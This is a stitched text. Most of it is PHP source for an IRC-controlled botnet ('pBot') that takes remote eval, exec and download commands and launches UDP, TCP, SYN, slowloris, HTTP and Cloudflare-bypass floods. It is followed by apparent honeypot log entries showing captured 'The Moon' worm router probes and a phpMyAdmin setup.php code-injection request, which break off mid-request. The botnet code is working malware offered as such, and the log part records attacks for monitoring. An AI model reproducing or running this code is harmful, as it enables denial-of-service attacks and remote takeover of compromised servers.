"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2Bitch Got Nulled!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2UdpFlood Started!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2UdpFlood Finished!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
Linksys "The Moon" Worm
[Attack info]
Attacker:
212.237.0.84
Dest. port: 80
Time: 20/08/2019 04:15:25
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host84-0-237-212.serverdedicati.aruba.it
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.1
Content-Length: 331
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetWanSettings"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 28.34.203.167
referer: http://28.34.203.167/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWanSettings xmlns="http://purenetworks.com/HNAP1/">
</GetWanSettings>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
212.237.0.84
Dest. port: 80
Time: 20/08/2019 04:15:24
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host84-0-237-212.serverdedicati.aruba.it
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.1
Content-Length: 345
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 28.34.203.167
referer: http://28.34.203.167/
Content-Type: text/xml; charset=UTF-8
authorization: Basic Og==
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/">
</GetRouterLanSettings2>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
212.237.0.84
Dest. port: 80
Time: 20/08/2019 04:15:23
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host84-0-237-212.serverdedicati.aruba.it
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.1
Content-Length: 337
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 28.34.203.167
referer: http://28.34.203.167/
Content-Type: text/xml; charset=UTF-8
authorization: Basic Og==
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterSettings xmlns="http://purenetworks.com/HNAP1/">
</GetRouterSettings>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
212.237.0.84
Dest. port: 80
Time: 20/08/2019 04:15:22
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host84-0-237-212.serverdedicati.aruba.it
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.1
Content-Length: 329
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 28.34.203.167
referer: http://28.34.203.167/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWLanRadios xmlns="http://purenetworks.com/HNAP1/">
</GetWLanRadios>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
Linksys "The Moon" Worm
[Attack info]
Attacker:
212.237.0.84
Dest. port: 80
Time: 20/08/2019 04:15:21
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host84-0-237-212.serverdedicati.aruba.it
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /HNAP1/ HTTP/1.1
Content-Length: 329
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 28.34.203.167
referer: http://28.34.203.167/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<IsDeviceReady xmlns="http://purenetworks.com/HNAP1/">
</IsDeviceReady>
</soap:Body>
</soap:Envelope>
Resource ( 1 / 0 )
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
51.159.7.51
Dest. port: 80
Time: 19/08/2019 23:29:13
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS12876 ONLINE S.A.S.
Location: Île-de-France, Clichy-sous-Bois (zipcode 93390)
rDNS: 51-159-7-51.rev.poneytelecom.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 238
cookie2: $Version="1"
Host: 28.34.203.167
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://28.34.203.167/phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=057cc0957a214ba23a3b4d124f889ac2
